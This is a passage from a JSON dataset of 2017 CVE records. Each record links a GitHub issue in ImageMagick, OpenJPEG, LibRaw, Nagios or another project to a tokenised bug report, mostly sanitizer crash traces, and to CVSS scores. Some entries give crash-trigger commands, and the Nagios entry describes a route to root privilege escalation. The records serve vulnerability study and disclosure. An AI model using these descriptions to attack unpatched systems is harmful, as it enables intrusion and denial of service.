APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d0f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG bdc0 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e2b in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). \u00b7\u00b7\u00b7 POC: URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14151",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/982",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/982",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2017-08-14T11:17:11Z",
        "description": "heap base buffer overflow in opj_mqc_flush (mqc.c). On NUMBERTAG ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14152",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/985",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/985",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2017-08-15T08:11:05Z",
        "description": "heap based buffer overflow in opj_write_bytes_LE (cio.c). On NUMBERTAG ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14164",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/991",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/991",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2017-08-16T14:30:54Z",
        "description": "heap based buffer overflow in opj_write_bytes_LE (cio.c) (unfixed NUMBERTAG On master: ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14172",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/715",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/715",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-31T14:37:10Z",
        "description": "denial of service APITAG issue in APITAG in coders/ps.c. Hello all. We found a denial of service APITAG issue in Imagemagick NUMBERTAG Q NUMBERTAG which can cause huge CPU and memory consumption. Note that this issue is quite similar to issue NUMBERTAG we have reported. The vulnerable code is shown as below. ERRORTAG A crafted PS image file, which claims large length but does not contain sufficient backing data, would cause a large loop at line NUMBERTAG since there is no EOF check inside. APITAG FILETAG The command we was using is APITAG In our tests we used a machine with Intel(R) Xeon(R) CPU E NUMBERTAG GHz NUMBERTAG CPU cores and NUMBERTAG GB RAM. This issue caused NUMBERTAG CPU and up to NUMBERTAG GB RAM consumption. This process lasted for about NUMBERTAG minutes. Note that this issue was found by Xiaohei and Wangchu from Alibaba Security Team. Thanks.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14173",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/713",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/713",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-31T12:43:45Z",
        "description": "An Infinite loop issue in APITAG coders/txt.c. Hello all. We found an infinite loop issue in Imagemagick NUMBERTAG Q NUMBERTAG The vulnerable code is shown as below. APITAG An integer overflow might happen for the addition operation APITAG when a crafted TXT file, which claims large max_value , is provided. APITAG FILETAG In our poc, we set max_value as NUMBERTAG L The command we was using is APITAG Note that this issue was found by Xiaohei and Wangchu from Alibaba Security Team. Thanks.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14174",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/714",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/714",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-31T14:06:02Z",
        "description": "denial of service APITAG issue in APITAG in coders/psd.c. Hello all. We found a denial of service APITAG issue in Imagemagick NUMBERTAG Q NUMBERTAG which can cause huge CPU consumption. Note that this issue is quite similar to issue NUMBERTAG we have reported. The vulnerable code is shown as below. ERRORTAG A crafted PSD image file, which claims large length but does not contain sufficient backing data, would cause a large loop at line NUMBERTAG since there is no EOF check inside. APITAG FILETAG The command we was using is APITAG In our tests we used a machine with Intel(R) Xeon(R) CPU E NUMBERTAG GHz NUMBERTAG CPU cores and NUMBERTAG GB RAM. This issue caused NUMBERTAG CPU for more than NUMBERTAG and a half minutes. Note that this issue was found by Xiaohei and Wangchu from Alibaba Security Team. Thanks.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14175",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/712",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/712",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-31T12:18:01Z",
        "description": "denial of service APITAG issue in APITAG in coders/xbm.c. Hello all. We found a denial of service APITAG issue in Imagemagick NUMBERTAG Q NUMBERTAG which can cause huge CPU and memory consumption. These issues are quite similar to the bugs we have found in APITAG ( CVETAG , CVETAG and CVETAG ). The vulnerable code is shown as below. ERRORTAG A crafted XBM image file, which claims large image >rows and image >columns but does not contain sufficient backing data, would cause a large and heavy loop at line NUMBERTAG since there is no EOF check inside. APITAG FILETAG The command we was using is APITAG In our tests we used a machine with Intel(R) Xeon(R) CPU E NUMBERTAG GHz NUMBERTAG CPU cores and NUMBERTAG GB RAM. This issue caused NUMBERTAG CPU and up to NUMBERTAG GB memory consumption. Note that this process lasted for more than NUMBERTAG minutes. Note that this issue was found by Xiaohei and Wangchu from Alibaba Security Team.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14181",
        "Issue_Url_old": "https://github.com/teknoraver/aacplusenc/issues/1",
        "Issue_Url_new": "https://github.com/teknoraver/aacplusenc/issues/1",
        "Repo_new": "teknoraver/aacplusenc",
        "Issue_Created_At": "2017-08-31T07:21:22Z",
        "description": "NULL pointer dereference in APITAG (bitbuffer.c). On NUMBERTAG ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-14224",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/733",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/733",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-06T02:18:32Z",
        "description": "Heap buffer overflow in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A heap buffer overflow vulnerability was found in function APITAG in APITAG allow attackers to cause a denial of service or remote code execution via a crafted file. ./magick convert NUMBERTAG im2pcx out.pcx CODETAG testcase: URLTAG Note that this issue was found by lifuhao from Aliyun Security Team. Thanks",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14229",
        "Issue_Url_old": "https://github.com/mdadams/jasper/issues/146",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/146",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2017-08-31T08:39:34Z",
        "description": "Infinite loop in jpc_dec.c of Jasper.. version: Summary: There is an infinite loop in jpc_dec.c of Jasper. Description: The gdb debugging information is listed below: (gdb) set args POC NUMBERTAG gdb) r The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: PATHTAG f PATHTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-14230",
        "Issue_Url_old": "https://github.com/cyrusimap/cyrus-imapd/issues/2132",
        "Issue_Url_new": "https://github.com/cyrusimap/cyrus-imapd/issues/2132",
        "Repo_new": "cyrusimap/cyrus-imapd",
        "Issue_Created_At": "2017-08-31T05:05:14Z",
        "description": "Broken Ohter Users behaviour in NUMBERTAG Gabriele Bulfon < EMAILTAG > reported this issue on the mailing list: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-14231",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/78",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/78",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2017-08-07T05:58:15Z",
        "description": "two loagic bugs in latest product. Hello Developers,i has find two logic bugs in your product\uff0cwhich maybe cause some problems I hope this helps you. the first point: at FILETAG line NUMBERTAG APITAG Here, you use the same password for testing the Second point: at FILETAG line NUMBERTAG APITAG , Let's follow up this function FILETAG line NUMBERTAG ERRORTAG Let's follow up Typo::strip FILETAG line NUMBERTAG ERRORTAG We can see that the regular expressions here are removed from the corner brackets for example:if username is APITAG then the function will return admin . But finally, the data does not check the same name before entering the database. so it will cause a large problem we can block any member's account if we know his username. why? because in FILETAG line NUMBERTAG c NUMBERTAG because there are two There are two users called admin That's what I want to say. If I don't make it clear, please contact me",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-14245",
        "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/317",
        "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/317",
        "Repo_new": "libsndfile/libsndfile",
        "Issue_Created_At": "2017-09-12T02:47:14Z",
        "description": "APITAG confusion in . function APITAG in ulaw.c and d2ulaw_array (const double ptr, int count, unsigned char buffer, double normfact) { while ( count NUMBERTAG if (ptr [count NUMBERTAG buffer [count] = ulaw_encode [lrint (normfact ptr [count])] ; else buffer [count NUMBERTAG F & ulaw_encode [ lrint (normfact ptr [count])] ; } ; } / d2ulaw_array /",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14248",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/717",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/717",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-01T04:37:53Z",
        "description": "A heap buffer overflow in function APITAG in resize.c. A bug was triggered when convert a file to pdf using APITAG , I use the command line \" ./magick convert pdf.poc FILETAG \" and the asan shows NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f6b7aafeb NUMBERTAG at pc NUMBERTAG d1d NUMBERTAG c bp NUMBERTAG ffc NUMBERTAG f NUMBERTAG sp NUMBERTAG ffc NUMBERTAG f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f6b7aafeb NUMBERTAG thread T NUMBERTAG d1d NUMBERTAG b in APITAG PATHTAG NUMBERTAG d NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG edef1 in APITAG PATHTAG NUMBERTAG a NUMBERTAG ff in APITAG PATHTAG NUMBERTAG a2a NUMBERTAG d in APITAG PATHTAG NUMBERTAG eb5a6a in APITAG PATHTAG NUMBERTAG fc NUMBERTAG da in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f6b7e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f NUMBERTAG in _start ( PATHTAG NUMBERTAG f6b7aafeb NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG e2c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG b NUMBERTAG c in APITAG PATHTAG NUMBERTAG cc NUMBERTAG in APITAG PATHTAG NUMBERTAG d2a NUMBERTAG in APITAG PATHTAG NUMBERTAG d NUMBERTAG a4 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG a NUMBERTAG f in APITAG PATHTAG NUMBERTAG a NUMBERTAG e in APITAG PATHTAG NUMBERTAG ea NUMBERTAG in APITAG PATHTAG NUMBERTAG fc NUMBERTAG da in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f6b7e NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG fedef NUMBERTAG d NUMBERTAG fedef NUMBERTAG d NUMBERTAG fedef NUMBERTAG d NUMBERTAG fedef NUMBERTAG d NUMBERTAG fedef NUMBERTAG d NUMBERTAG fedef NUMBERTAG d NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fedef NUMBERTAG d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fedef NUMBERTAG d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fedef NUMBERTAG d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fedef NUMBERTAG da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fedef NUMBERTAG db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING The poc was at: URLTAG Note that this issue was found by lifuhao from Aliyun Security Team.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14249",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/708",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/708",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-31T03:50:27Z",
        "description": "\"FPE on unknown address\" error when converting to pdf . Hello , this is the first time I post a bug. I use AFL with Asan to test APITAG and find a crash in APITAG when converting file to pdf. My command line: ./magick convert poc out.pcd The Asan shows: ASAN:DEADLYSIGNAL APITAG NUMBERTAG ERROR: APITAG FPE on unknown address NUMBERTAG pc NUMBERTAG c8ae1 bp NUMBERTAG c4a NUMBERTAG a NUMBERTAG sp NUMBERTAG ffcdaf8f NUMBERTAG T NUMBERTAG c8ae0 in APITAG PATHTAG NUMBERTAG d NUMBERTAG aea in APITAG PATHTAG NUMBERTAG ac5ed2 in APITAG PATHTAG NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG a NUMBERTAG ff in APITAG PATHTAG NUMBERTAG a2a NUMBERTAG d in APITAG PATHTAG NUMBERTAG eb5a6a in APITAG PATHTAG NUMBERTAG fc NUMBERTAG da in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ad NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG FPE PATHTAG in APITAG NUMBERTAG ABORTING And the poc: URLTAG Thank you",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14257",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/181",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/181",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2017-09-08T10:29:00Z",
        "description": "Multiple Exploitable and Non Exploitable issues Identified. Exploitable Write Access Violation: APITAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-14265",
        "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/99",
        "Issue_Url_new": "https://github.com/libraw/libraw/issues/99",
        "Repo_new": "libraw/libraw",
        "Issue_Created_At": "2017-09-08T09:02:39Z",
        "description": "A Stack Buffer Overflow was discovered in APITAG A Stack Buffer Overflow was discovered in APITAG APITAG It could allow remote denial of service and code execution attack. command to reproduce: APITAG the latest version is vulnerable. other versions may also be affected. the sanitizer output: ERRORTAG in APITAG , color was defined as: APITAG with the input testcase in gdb, we could see that the h is NUMBERTAG which leads stack overflow CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-14312",
        "Issue_Url_old": "https://github.com/NagiosEnterprises/nagioscore/issues/424",
        "Issue_Url_new": "https://github.com/nagiosenterprises/nagioscore/issues/424",
        "Repo_new": "nagiosenterprises/nagioscore",
        "Issue_Created_At": "2017-08-30T12:27:48Z",
        "description": "Root privilege escalation via insecure executable/config permissions. This is still a work in progress; our Nagios installation is pretty simple so I'll have to do some testing to make sure none of my proposed solutions break things. Problem When Nagios is configured, the user and group under which it will run are chosen: CODETAG Both default to \"nagios\" the following is from APITAG : CODETAG Immediately after those two lines, this appears: APITAG Those APITAG are then used in every invocation of the install command during installation. This can lead to a root exploit in at least two ways. The fundamental problem is that the nagios daemon is intended to be launched as root, but the daemon itself and some critical configuration files are writable (in an exploitable way) by the restricted nagios user NUMBERTAG The binary for the daemon itself, i.e. APITAG is owned by the APITAG , but will be run as root. The APITAG can overwrite that binary with whatever he wants, and root will run it NUMBERTAG The configuration file APITAG specifies the user and group that nagios will run as, but is owned by that same APITAG . He can edit APITAG himself, and set APITAG , APITAG . The command definition file APITAG is also owned by APITAG , and he can place whatever commands in there he likes. Considering that the daemon will run as root the next time it is launched, this will also let the APITAG gain root eventually. Resolution At the very least, APITAG and the executables must not be writable by anyone other than root. To ensure that the executables aren't owned by the nagios user, it suffices to set APITAG in APITAG and APITAG . For the configuration file, I'm not so sure: is there a reason for the other configs (besides APITAG ) to be owned by the APITAG and APITAG ?",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-14324",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/739",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/739",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-08T09:44:06Z",
        "description": "memory leak in APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG gcc NUMBERTAG crash link : URLTAG trigger command : ./magick convert im_poc NUMBERTAG dev/null detail : APITAG APITAG PATHTAG ./magick convert im_poc NUMBERTAG dev/null convert: improper image header ERRORTAG /dev/null' @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG effb NUMBERTAG b NUMBERTAG in malloc ( PATHTAG NUMBERTAG effb6b3b NUMBERTAG in APITAG APITAG NUMBERTAG effb6b3b NUMBERTAG a in APITAG APITAG NUMBERTAG effb6c6d0ce in APITAG APITAG NUMBERTAG effb6d NUMBERTAG in APITAG APITAG NUMBERTAG effb NUMBERTAG ce6b0 in APITAG APITAG NUMBERTAG effb NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG effb NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG effb NUMBERTAG dacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG effb NUMBERTAG c NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14325",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/741",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/741",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-08T09:44:18Z",
        "description": "memory leak in APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG gcc NUMBERTAG crash link : FILETAG trigger command : ./magick convert APITAG output.mpc ./magick convert output.mpc output.art detail : APITAG APITAG PATHTAG ./magick convert APITAG output.mpc PATHTAG ./magick convert output.mpc output.art APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG faa NUMBERTAG f NUMBERTAG in posix_memalign ( PATHTAG NUMBERTAG faa NUMBERTAG c NUMBERTAG d in APITAG APITAG NUMBERTAG faa NUMBERTAG a3edcc in APITAG APITAG NUMBERTAG faa NUMBERTAG a3ea NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG bdbc NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG e7c NUMBERTAG f in APITAG APITAG NUMBERTAG faa NUMBERTAG ab NUMBERTAG b0 in APITAG APITAG NUMBERTAG faa NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG acd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG faa NUMBERTAG aae NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG faa NUMBERTAG e NUMBERTAG in malloc ( PATHTAG NUMBERTAG faa NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG c NUMBERTAG a in APITAG APITAG NUMBERTAG faa NUMBERTAG a3eebd in APITAG APITAG NUMBERTAG faa NUMBERTAG a3ea NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG bdbc NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG e7c NUMBERTAG f in APITAG APITAG NUMBERTAG faa NUMBERTAG ab NUMBERTAG b0 in APITAG APITAG NUMBERTAG faa NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG acd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG faa NUMBERTAG aae NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14326",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/740",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/740",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-08T09:44:12Z",
        "description": "memory leak in APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG gcc NUMBERTAG crash link : FILETAG trigger command : ./magick convert im_poc NUMBERTAG mat /dev/null detail : APITAG APITAG PATHTAG ./magick im_poc NUMBERTAG mat /dev/null lt magick: multi dimensional matrices are not supported APITAG @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG fda NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG f in APITAG APITAG NUMBERTAG f NUMBERTAG cb9a in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ef6b0 in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG fd NUMBERTAG fa in APITAG APITAG NUMBERTAG f NUMBERTAG fdb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG cba in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG ebeacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG fda NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e4 in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e2a in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG d in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ef6b0 in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG fd NUMBERTAG fa in APITAG APITAG NUMBERTAG f NUMBERTAG fdb NUMBERTAG in APITAG APITAG 